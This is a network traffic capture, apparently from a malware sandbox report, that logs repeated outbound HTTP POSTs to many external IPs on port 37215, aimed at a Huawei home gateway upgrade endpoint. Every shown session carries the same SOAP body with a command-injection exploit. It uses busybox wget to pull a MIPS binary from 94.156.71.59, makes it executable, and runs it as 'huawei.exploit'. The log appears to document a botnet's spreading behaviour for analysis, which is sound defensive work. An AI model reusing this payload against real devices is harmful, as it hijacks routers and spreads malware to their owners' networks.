                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            850192.168.2.1340532156.21.120.14337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.850205898 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            851192.168.2.1355572197.81.50.5537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.851207018 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            852192.168.2.133495641.155.99.20937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.852405071 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            853192.168.2.1337098156.201.215.14837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.853487015 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            854192.168.2.136076041.101.217.2637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.854671001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            855192.168.2.134688841.147.198.19837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.856029987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            856192.168.2.135220641.31.52.17237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.857259989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            857192.168.2.1349962197.135.181.9837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.858288050 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            858192.168.2.135573441.119.169.8237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.859446049 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            859192.168.2.134408041.39.148.20437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.860486984 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 